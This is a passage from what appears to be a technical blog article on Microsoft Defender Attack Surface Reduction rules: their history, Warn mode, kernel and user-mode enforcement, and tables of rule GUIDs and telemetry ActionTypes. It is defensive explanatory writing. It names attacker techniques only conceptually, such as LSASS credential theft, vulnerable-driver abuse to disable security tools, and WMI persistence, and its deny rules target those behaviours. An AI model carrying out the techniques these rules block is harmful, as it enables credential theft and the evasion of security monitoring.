&lt;li&gt;&lt;strong&gt;Block persistence through WMI event subscription&lt;/strong&gt; -- &lt;code&gt;e6db77e5-3df2-4cf1-b95a-636979351e5b&lt;/code&gt; -- 1903. The APT29 / Cobalt Strike &lt;code&gt;__FilterToConsumerBinding&lt;/code&gt; response.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each rule is a direct response to a specific attacker move. The LSASS rule answers Mimikatz. The PSExec/WMI rule answers Emotet&apos;s lateral movement. The WMI persistence rule answers permanent-implant techniques that survive reboot through the WMI repository.&lt;/p&gt;
&lt;p&gt;The PSExec/WMI rule (&lt;code&gt;d1e49aac-...&lt;/code&gt;) is the textbook example of an ASR rule with high enterprise friction. Microsoft Configuration Manager (formerly SCCM) relies heavily on WMI; Microsoft Learn&apos;s overview page explicitly tells administrators not to set this rule to Block or Warn without extensive Audit-mode testing if Configuration Manager manages the device, &quot;because the Configuration Manager client relies heavily on WMI&quot; [@ms-learn-asr-overview]. Most large estates therefore run this rule in Audit indefinitely.&lt;/p&gt;
&lt;h3&gt;Generation 3, April 2020 -- Warn mode&lt;/h3&gt;
&lt;p&gt;Until 2020, the only choices for an ASR rule were Audit (logs only) and Block (the operation fails). The middle ground was a productivity problem: a power user whose legitimate IT-automation macro was being blocked had no recourse short of a help-desk ticket. The Microsoft Defender team&apos;s &quot;Demystifying attack surface reduction rules - Part 1&quot; Tech Community post, modified time April 22, 2020, announced the third mode -- Warn -- with a user-facing block dialog and a 24-hour per-user per-rule per-app exclusion cache [@techcommunity-demystifying-asr-part1].&lt;/p&gt;
&lt;p&gt;Two precision facts deserve to be stated cleanly, because both contradict secondary-source folklore.&lt;/p&gt;
&lt;p&gt;First, the platform prerequisite for Warn mode is Microsoft Defender Antivirus platform release &lt;strong&gt;4.18.2008.9 (August 2020) or later, engine release 1.1.17400.5 or later&lt;/strong&gt; [@ms-learn-asr-overview]. The older secondary-blog claim of &quot;4.18.2001.10 / January 2020&quot; is contradicted by Microsoft Learn&apos;s current canonical page and should not be repeated.&lt;/p&gt;
&lt;p&gt;Second, exactly &lt;strong&gt;two&lt;/strong&gt; ASR rules deliberately skip Warn mode and go straight from Audit to Block, not five. Microsoft Learn&apos;s overview page lists them verbatim: &quot;Block credential stealing from the Windows local security authority subsystem&quot; and &quot;Block Office applications from injecting code into other processes&quot; [@ms-learn-asr-overview]. The folklore that lists five no-Warn rules (sometimes including the Webshell rule, the Safe Mode reboot rule, and the copied-tools rule) is wrong. The rules reference page enumerates Warn-mode bypass &lt;code&gt;ActionType&lt;/code&gt; variants for the Safe Mode reboot rule (&lt;code&gt;AsrSafeModeRebootWarnBypassed&lt;/code&gt;) and the copied-tools rule (&lt;code&gt;AsrAbusedSystemToolWarnBypassed&lt;/code&gt;) -- direct byte-level proof that those rules do support Warn [@ms-learn-asr-reference].&lt;/p&gt;

flowchart LR
    A[&quot;Audit - Log only, no enforcement&quot;] --&amp;gt; W[&quot;Warn - User can bypass for 24h&quot;]
    W --&amp;gt; B[&quot;Block - Operation fails&quot;]
    A2[&quot;LSASS rule and Office injection rule&quot;] --&amp;gt; A
    A2 --&amp;gt; B
&lt;p&gt;The reason these two rules skip Warn is structural, not cosmetic. A low-privilege user cannot meaningfully consent to a process opening LSASS memory; the consent dialog would itself be a credential-theft enabler. Likewise, a non-admin user cannot rationally decide whether &lt;code&gt;WINWORD.EXE&lt;/code&gt; should be allowed to inject shellcode into &lt;code&gt;explorer.exe&lt;/code&gt;; the request encodes its own malice. The remaining sixteen rules support the full Audit, Warn, Block ladder.&lt;/p&gt;
&lt;h3&gt;Generation 4a, December 2021 -- the BYOVD rule&lt;/h3&gt;
&lt;p&gt;The 2020-2022 era brought a new attacker move into mainstream incident response: Bring Your Own Vulnerable Driver, or BYOVD. The attacker imports a legitimate, signed, but vulnerable kernel driver, exploits its bug to gain kernel-mode primitives, uses those primitives to disable EDR and antivirus monitoring, and proceeds.&lt;/p&gt;
&lt;p&gt;The 2021 motivating events made the threat unambiguous. Lazarus&apos;s autumn-2021 abuse of CVE-2021-21551 (Dell &lt;code&gt;dbutil_2_3.sys&lt;/code&gt;) was the first recorded in-the-wild abuse of that driver, disclosed by ESET on September 30, 2022 [@welivesecurity-lazarus-byovd-2022] [@nvd-cve-2021-21551]. BlackByte&apos;s October 2022 abuse of CVE-2019-16098 (MSI Afterburner &lt;code&gt;RTCore64.sys&lt;/code&gt;) was documented by Sophos with one of the year&apos;s defining lines: &quot;disabling a whopping list of over 1,000 drivers on which security products rely to provide protection&quot; [@sophos-blackbyte-returns-2022] [@nvd-cve-2019-16098].&lt;/p&gt;

An attack pattern in which the operator imports a signed but exploitable kernel driver into the victim environment, exploits a known driver vulnerability to obtain kernel-mode primitives (typically arbitrary memory read or write), and uses those primitives to disable security telemetry. CVE-2021-21551 (Dell DBUtil) and CVE-2019-16098 (MSI Afterburner) are the canonical examples; the Sophos write-up of BlackByte&apos;s RTCore64.sys abuse documents disabling roughly one thousand security-product drivers [@nvd-cve-2021-21551] [@nvd-cve-2019-16098] [@sophos-blackbyte-returns-2022].
&lt;p&gt;Microsoft launched the Vulnerable and Malicious Driver Reporting Center on December 8, 2021, explicitly naming the new ASR rule as the enforcement layer alongside the kernel-load-time &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;Vulnerable Driver Blocklist&lt;/a&gt; [@ms-security-blog-vulnerable-driver-center]. The ASR rule is &quot;Block abuse of exploited vulnerable signed drivers (Device)&quot; -- GUID &lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt; [@ms-learn-asr-reference]. The Windows 11 22H2 release on September 20, 2022 [@windows-blog-windows-11-2022-update] made the Microsoft Vulnerable Driver Blocklist default-on for all devices, which is the kernel-load-time sibling to the ASR write-time block [@ms-learn-driver-block-rules].&lt;/p&gt;
&lt;h3&gt;Generation 4b, February and July 2022 -- the parallel layer&lt;/h3&gt;
&lt;p&gt;This is the generation that deserves the most honest framing in the article, because the marketing version oversimplifies what actually happened to Office macros.&lt;/p&gt;
&lt;p&gt;Tom Gallagher&apos;s February 7, 2022 Microsoft 365 Blog post announces the default block of VBA macros in &lt;a href=&quot;https://paragmali.com/blog/mark-of-the-web-smartscreen-catalog-of-trust/&quot; rel=&quot;noopener&quot;&gt;MOTW&lt;/a&gt;-internet documents [@ms-techcommunity-internet-macros-2022]. The trust bar removes the &quot;Enable Content&quot; button entirely. Microsoft pauses the rollout on July 8, 2022 for usability adjustments, then resumes on July 20, 2022 -- both dates verifiable from the post&apos;s &lt;code&gt;article:modified_time&lt;/code&gt; metadata. ESET&apos;s June 2022 write-up confirms the intended effect: between April 26 and May 2, 2022 Emotet operators were already testing LNK and ISO replacements for the macro carrier [@welivesecurity-emotet-pivot-2022].&lt;/p&gt;

A wide range of threat actors continue to target our customers by sending documents and luring them into enabling malicious macro code. -- Tom Gallagher, Partner Group Engineering Manager, Office Security, February 7, 2022 [@ms-techcommunity-internet-macros-2022]
&lt;p&gt;The Microsoft 365 Apps default block is &lt;strong&gt;not&lt;/strong&gt; a generation of ASR. It is a parallel layer that ships inside Office, runs against every Microsoft 365 Apps installation managed or unmanaged, and uses the MOTW as its trigger rather than the kernel-mode minifilter. It cooperates with ASR; it does not subsume ASR.&lt;/p&gt;

The popular &quot;ASR stopped Office macros&quot; claim is half right. The Office-macro era ended through three layers in combination: (1) Europol&apos;s Operation LadyBird on January 27, 2021, coordinated international takedown of Emotet&apos;s command-and-control infrastructure [@europol-emotet-disrupted-wayback]; (2) ASR&apos;s 2017-onward Office rules at the enterprise tier, managed through Intune, Group Policy, or Defender for Endpoint; (3) the Microsoft 365 Apps internet-macro default block at the consumer and tenant tier, default-on for every Microsoft 365 installation since the July 2022 staged rollout [@ms-techcommunity-internet-macros-2022]. ASR is the enterprise-managed layer; it was not the only layer. The polished version of the story names all three.
&lt;p&gt;A coincidence worth noting: Europol&apos;s Operation LadyBird seized Emotet&apos;s command-and-control infrastructure on January 27, 2021 [@europol-emotet-disrupted-wayback]. SANS Internet Storm Center Diary 27036, published the same day by handler Daniel Wesemann, documented the canonical WMI-grandparent bypass to the Office-child-process ASR rule [@sans-isc-27036-emotet-asr]. A takedown and a bypass landed on the same Wednesday.&lt;/p&gt;
&lt;h3&gt;Generation 5, 2023-2026 -- Standard protection and the long tail&lt;/h3&gt;
&lt;p&gt;By 2023 Microsoft had enough deployment telemetry to partition the rules into two categories. The &lt;strong&gt;Standard protection rules&lt;/strong&gt; are the three with a low false-positive floor, safe to enable in Block mode without staged rollout: BYOVD, LSASS credential-theft, and WMI persistence [@ms-learn-asr-overview]. The remaining sixteen are &lt;strong&gt;Other ASR rules&lt;/strong&gt; and require the full Audit, Warn, Block ladder. Several new rules landed in this period [@ms-learn-asr-reference]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Block Webshell creation for Servers&lt;/strong&gt; -- &lt;code&gt;a8f5898e-1dc8-49a9-9878-85004b8a61e6&lt;/code&gt; -- the post-HAFNIUM / ProxyShell response. This is the only rule in the catalogue whose row in the Microsoft Learn reference shows &quot;N&quot; for EDR alerts, meaning it does not emit a paired &lt;code&gt;Audited&lt;/code&gt; and &lt;code&gt;Blocked&lt;/code&gt; &lt;code&gt;ActionType&lt;/code&gt; in &lt;code&gt;DeviceEvents&lt;/code&gt;. Defenders hunt blocked webshell drops through &lt;code&gt;MpCmdRun.log&lt;/code&gt; and IIS access logs, not Advanced Hunting.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block rebooting machine in Safe Mode&lt;/strong&gt; -- &lt;code&gt;33ddedf1-c6e0-47cb-833e-de6133960387&lt;/code&gt; -- the BlackByte-era safe-mode-encryption response.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block use of copied or impersonated system tools&lt;/strong&gt; -- &lt;code&gt;c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb&lt;/code&gt; -- the rename-and-relocate evasion response (attackers copying &lt;code&gt;cmd.exe&lt;/code&gt; to a writable path and renaming it &lt;code&gt;update.exe&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block untrusted and unsigned processes that run from USB&lt;/strong&gt; -- &lt;code&gt;b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4&lt;/code&gt; -- the BadUSB / removable-media response.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block Office communication application from creating child processes&lt;/strong&gt; -- &lt;code&gt;26190899-1602-49e8-8b27-eb1d0a1ce869&lt;/code&gt; -- the Outlook variant of the Office-child-process rule.&lt;/li&gt;
&lt;/ul&gt;

The three ASR rules Microsoft classifies as safe to enable in Block mode without staged rollout: Block abuse of exploited vulnerable signed drivers, Block credential stealing from the Windows local security authority subsystem, and Block persistence through WMI event subscription. The classification appears verbatim on the ASR rules overview page [@ms-learn-asr-overview]. The LSASS rule is redundant when LSA Protection is enabled; the WMI persistence rule still requires Audit testing if Microsoft Configuration Manager manages the device.
&lt;p&gt;The catalogue stands at &lt;strong&gt;19 rules as of May 2026&lt;/strong&gt; -- three Standard protection rules and sixteen Other ASR rules, the count inclusive of the server-only Webshell rule that does not emit &lt;code&gt;DeviceEvents&lt;/code&gt; [@ms-learn-asr-reference]. The pattern is consistent enough that the next section gives it a name.&lt;/p&gt;
&lt;h2&gt;5. Edges, Not Nodes&lt;/h2&gt;
&lt;p&gt;The structural pivot the whole article rests on can be written in one sentence: signatures classify nodes; AppLocker classifies identities; ASR classifies edges in the runtime graph. The rest of this section unpacks what that means and why it matters.&lt;/p&gt;
&lt;p&gt;A &lt;em&gt;node&lt;/em&gt; in the runtime graph is a binary or a file -- the kind of thing static analysis can fingerprint. An &lt;em&gt;edge&lt;/em&gt; is a runtime relationship between two nodes: process A creating process B, process A writing file F, process A opening a handle to LSASS memory, the WMI repository writing a new &lt;code&gt;__FilterToConsumerBinding&lt;/code&gt;. Signatures answer &quot;is this node bad?&quot; -- undecidable in general per Cohen 1984 [@cohen-1984-part1]. AppLocker answers &quot;is this node&apos;s identity on the allow-list?&quot; -- decidable but blind to LOLBin chains [@lolbas-project]. ASR answers &quot;did this specific edge happen?&quot; -- decidable per event at the OS interception layer.&lt;/p&gt;
&lt;p&gt;The Cohen sidestep is precise. Cohen 1984 proved that classifying nodes (&quot;is this program malicious?&quot;) is undecidable in general, via a reduction to the Halting Problem. He did &lt;strong&gt;not&lt;/strong&gt; prove that classifying runtime edges is undecidable, because &quot;did this specific parent-child invocation just happen?&quot; is an observable proposition. The kernel sees the system call. The decision is local. No static analysis is required. ASR is the canonical industrial instantiation of that insight; every generation in Section 4 is a catalogue extension within the edge-classification approach, not a structural reframing of it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Signatures classify nodes. AppLocker classifies identities. ASR classifies edges in the runtime graph. By moving from node classification to edge classification, Microsoft sidesteps Cohen-1984 undecidability in the practical sense: you do not need to decide whether the binary is malicious, only whether the edge happened. The kernel sees the edge.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Where does the enforcement actually live? The &quot;kernel-mediated&quot; framing earns its phrasing in three precise pieces.&lt;/p&gt;
&lt;p&gt;First, &lt;code&gt;WdFilter.sys&lt;/code&gt; is the Microsoft Defender Antivirus minifilter driver.An altitude, in Windows Filter Manager terminology, is a 32-bit decimal that determines the order in which file-system minifilters see I/O. Higher altitudes see I/O first on the way down to the file system and last on the way back up. Anti-virus drivers live in the 320000-329998 band. It is registered with the Windows Filter Manager in the &lt;strong&gt;FSFilter Anti-Virus altitude band (320000-329998), specifically at altitude 328010&lt;/strong&gt; per Microsoft&apos;s IFS allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]. It runs in &lt;strong&gt;kernel mode&lt;/strong&gt; and intercepts process-creation, image-load, file-write, and (for some rules) WMI and registry edges through Filter Manager pre-operation callbacks and process / image-load notify routines.&lt;/p&gt;

The Microsoft Defender Antivirus minifilter driver. Registered with the Windows Filter Manager at altitude 328010 in the FSFilter Anti-Virus band (320000-329998) per Microsoft&apos;s allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]. It runs in kernel mode and hosts the interception callbacks that ASR uses to see process-creation, image-load, and file-write edges before the user-mode actor completes the operation.
&lt;p&gt;Second, &lt;code&gt;MsMpEng.exe&lt;/code&gt; is the Defender Antivirus service process. It runs in &lt;strong&gt;user mode&lt;/strong&gt; at integrity level System. For every intercepted edge it consults the per-rule predicate, the per-rule exclusion list, and (for cloud-protected rules) the Microsoft Active Protection Service reputation, then returns Audit, Warn, or Block. The kernel/user-mode split is structural, not accidental. Interception must happen in the kernel before the user-mode actor completes the call. But exclusion-list lookup and cloud reputation are not appropriate inside a minifilter that holds the IRP open.&lt;/p&gt;

The Microsoft Defender Antivirus service process. Runs in user mode at integrity level System and hosts the policy-evaluation engine that decides Audit, Warn, or Block for every edge intercepted by `WdFilter.sys`. The two together form the kernel-mediated, user-mode-evaluated enforcement architecture that ASR relies on.
&lt;p&gt;Third, telemetry. ASR blocks land in Defender for Endpoint&apos;s &lt;code&gt;DeviceEvents&lt;/code&gt; Advanced Hunting table with a rule-specific &lt;code&gt;ActionType&lt;/code&gt; such as &lt;code&gt;AsrOfficeChildProcessBlocked&lt;/code&gt; or &lt;code&gt;AsrLsassCredentialTheftBlocked&lt;/code&gt;. The rules reference enumerates a paired &lt;code&gt;Audited&lt;/code&gt; and &lt;code&gt;Blocked&lt;/code&gt; &lt;code&gt;ActionType&lt;/code&gt; for every rule except the Webshell rule, which is the only one without a &lt;code&gt;DeviceEvents&lt;/code&gt; row [@ms-learn-asr-reference]. The universal hunting query is &lt;code&gt;DeviceEvents | where ActionType startswith &quot;Asr&quot;&lt;/code&gt;. The generic &lt;code&gt;AsrRuleTriggered&lt;/code&gt; is folk wisdom; it has never existed.&lt;/p&gt;

Microsoft Defender for Endpoint&apos;s Kusto Query Language (KQL) surface over endpoint telemetry. ASR blocks and audit events land in the `DeviceEvents` table with rule-specific `ActionType` values. Defenders combine `DeviceEvents` with `DeviceProcessEvents`, `DeviceFileEvents`, and `DeviceImageLoadEvents` to assemble the corroborating edge data around any ASR row [@ms-learn-asr-reference].

flowchart LR
    P[&quot;User-mode process&lt;br /&gt;WINWORD.EXE&quot;] --&amp;gt;|&quot;CreateProcessW&quot;| K[&quot;Windows kernel&lt;br /&gt;process-creation notify&quot;]
    K --&amp;gt; WD[&quot;WdFilter.sys&lt;br /&gt;kernel-mode minifilter&lt;br /&gt;altitude 328010&quot;]
    WD --&amp;gt;|&quot;edge event&quot;| MP[&quot;MsMpEng.exe&lt;br /&gt;user-mode service&lt;br /&gt;rule predicate + exclusions + MAPS&quot;]
    MP --&amp;gt;|&quot;Audit / Warn / Block&quot;| WD
    WD --&amp;gt;|&quot;fail or allow CreateProcessW&quot;| P
    MP --&amp;gt;|&quot;telemetry&quot;| DE[&quot;DeviceEvents&lt;br /&gt;ActionType = AsrOfficeChildProcessBlocked&quot;]

A common misconception is &quot;ASR runs in the kernel.&quot; That is partially true and structurally incomplete. The interception point is kernel-mode; the policy evaluation is user-mode. Both are necessary. The kernel must see the edge before the user-mode actor completes the operation, but the cloud reputation lookup and the per-rule exclusion list are not appropriate to run inside a minifilter that holds the IRP open. The correct one-line framing is &quot;kernel-mediated interception, user-mode policy evaluation.&quot;
&lt;p&gt;The marginal performance cost of an ASR check is bounded by the existing &lt;code&gt;WdFilter.sys&lt;/code&gt; callout that already runs for real-time scanning. ASR piggybacks on callouts the antivirus engine has already paid for. Microsoft has not published a number isolating ASR per-event overhead from broader minifilter cost; the IFS allocated-altitudes page is the closest published reference [@ms-learn-ifs-allocated-altitudes]. The sub-microsecond-per-event framing is INFERRED from the architecture, not measured.&lt;/p&gt;

&quot;Protection from denial of services requires the detection of halting programs which is well known to be undecidable.&quot; -- Fred Cohen, &quot;Computer Viruses: Theory and Experiments,&quot; 1984 [@cohen-1984-part1]
&lt;p&gt;The framework now in place is &quot;name a behaviour class, ship an enforcement edge.&quot; Nine years and seven generations of catalogue extension have followed that single rule. So what does the catalogue look like in detail today? The next section is the reference table: nineteen rules, organised by category, with GUID, ActionType, and the attacker behaviour each one closes.&lt;/p&gt;
&lt;h2&gt;6. The Nineteen Rules in Detail&lt;/h2&gt;
&lt;p&gt;This section is the article&apos;s reference table. Not a deployment guide (that comes in Section 10), but a catalogue to return to when you need to remember which GUID maps to which behaviour and which &lt;code&gt;ActionType&lt;/code&gt; lands in &lt;code&gt;DeviceEvents&lt;/code&gt;. Every row is from Microsoft Learn&apos;s rules reference page [@ms-learn-asr-reference].&lt;/p&gt;
&lt;h3&gt;Standard protection rules (3 rules)&lt;/h3&gt;
&lt;p&gt;Microsoft itself recommends enabling these three in Block mode without staged rollout, because their false-positive floor is low [@ms-learn-asr-overview].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Short name&lt;/th&gt;
&lt;th&gt;GUID&lt;/th&gt;
&lt;th&gt;ActionType (Blocked)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Block abuse of exploited vulnerable signed drivers&lt;/td&gt;
&lt;td&gt;&lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrVulnerableSignedDriverBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The BYOVD response; pairs with the kernel-load-time Vulnerable Driver Blocklist [@ms-learn-driver-block-rules]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block credential stealing from the Windows local security authority subsystem&lt;/td&gt;
&lt;td&gt;&lt;code&gt;9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrLsassCredentialTheftBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Redundant when LSA Protection is enabled [@ms-learn-asr-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block persistence through WMI event subscription&lt;/td&gt;
&lt;td&gt;&lt;code&gt;e6db77e5-3df2-4cf1-b95a-636979351e5b&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrPersistenceThroughWmiBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Still requires Audit testing if Configuration Manager manages the device&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Productivity apps (6 rules)&lt;/h3&gt;
&lt;p&gt;The Office and Adobe response pack, anchored by the Office-child-process rule that opens this article.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Short name&lt;/th&gt;
&lt;th&gt;GUID&lt;/th&gt;
&lt;th&gt;ActionType (Blocked)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Block all Office applications from creating child processes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;d4f940ab-401b-4efc-aadc-ad5f3c50688a&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrOfficeChildProcessBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The macro-to-PowerShell stopper&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block Office applications from creating executable content&lt;/td&gt;
&lt;td&gt;&lt;code&gt;3b576869-a4ec-4529-8536-b80a7769e899&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrExecutableOfficeContentBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Blocks dropped EXEs from Office processes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block Office applications from injecting code into other processes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrOfficeProcessInjectionBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No Warn-mode support [@ms-learn-asr-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block Win32 API calls from Office macros&lt;/td&gt;
&lt;td&gt;&lt;code&gt;92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrOfficeMacroWin32ApiCallsBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Refuses &lt;code&gt;Declare&lt;/code&gt; statements that bind to native DLLs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block Office communication application from creating child processes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;26190899-1602-49e8-8b27-eb1d0a1ce869&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrOfficeCommAppChildProcessBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The Outlook variant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block Adobe Reader from creating child processes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrAdobeReaderChildProcessBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The PDF response&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Scripts and email (3 rules)&lt;/h3&gt;
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;AMSI&lt;/a&gt;-backed script-content rules plus the email-drop-execution rule.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Short name&lt;/th&gt;
&lt;th&gt;GUID&lt;/th&gt;
&lt;th&gt;ActionType (Blocked)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Block execution of potentially obfuscated scripts&lt;/td&gt;
&lt;td&gt;&lt;code&gt;5beb7efe-fd9a-4556-801d-275e5ffc04cc&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrObfuscatedScriptBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AMSI-backed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block JavaScript or VBScript from launching downloaded executable content&lt;/td&gt;
&lt;td&gt;&lt;code&gt;d3e037e1-3eb8-44c8-a917-57927947596d&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrScriptExecutableDownloadBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The drive-by-download response&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block executable content from email client and webmail&lt;/td&gt;
&lt;td&gt;&lt;code&gt;be9ba2d9-53ea-4cdc-84e5-9b1eeee46550&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrExecutableEmailContentBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Catches the dropped-attachment-run pattern&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Lateral movement and prevalence (4 rules)&lt;/h3&gt;
&lt;p&gt;The cloud-protected, prevalence-based rules plus the Emotet lateral-movement responses.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Short name&lt;/th&gt;
&lt;th&gt;GUID&lt;/th&gt;
&lt;th&gt;ActionType (Blocked)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Block process creations originating from PSExec and WMI commands&lt;/td&gt;
&lt;td&gt;&lt;code&gt;d1e49aac-8f56-4280-b9ba-993a6d77406c&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrPsexecWmiChildProcessBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Conflicts with Configuration Manager [@ms-learn-asr-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block executable files from running unless they meet a prevalence, age, or trusted list criterion&lt;/td&gt;
&lt;td&gt;&lt;code&gt;01443614-cd74-433a-b99e-2ecdc07bfc25&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrUntrustedExecutableBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires cloud protection (MAPS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block untrusted and unsigned processes that run from USB&lt;/td&gt;
&lt;td&gt;&lt;code&gt;b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrUntrustedUsbProcessBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The BadUSB response&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Use advanced protection against ransomware&lt;/td&gt;
&lt;td&gt;&lt;code&gt;c1db55ab-c21a-4637-bb3f-a12568109d35&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrRansomwareBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requires cloud protection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Server, system-tool, and safe-mode (3 rules)&lt;/h3&gt;
&lt;p&gt;The post-2022 additions.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Short name&lt;/th&gt;
&lt;th&gt;GUID&lt;/th&gt;
&lt;th&gt;ActionType (Blocked)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Block Webshell creation for Servers&lt;/td&gt;
&lt;td&gt;&lt;code&gt;a8f5898e-1dc8-49a9-9878-85004b8a61e6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(no DeviceEvents pair)&lt;/td&gt;
&lt;td&gt;Only rule without a &lt;code&gt;DeviceEvents&lt;/code&gt; ActionType [@ms-learn-asr-reference]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block rebooting machine in Safe Mode&lt;/td&gt;
&lt;td&gt;&lt;code&gt;33ddedf1-c6e0-47cb-833e-de6133960387&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AsrSafeModeRebootBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Also emits &lt;code&gt;AsrSafeModeRebootWarnBypassed&lt;/code&gt; -- proof Warn is supported&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block use of copied or impersonated system tools&lt;/td&gt;
&lt;td&gt;&lt;code&gt;c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb&lt;/code&gt;&lt;/td&gt;
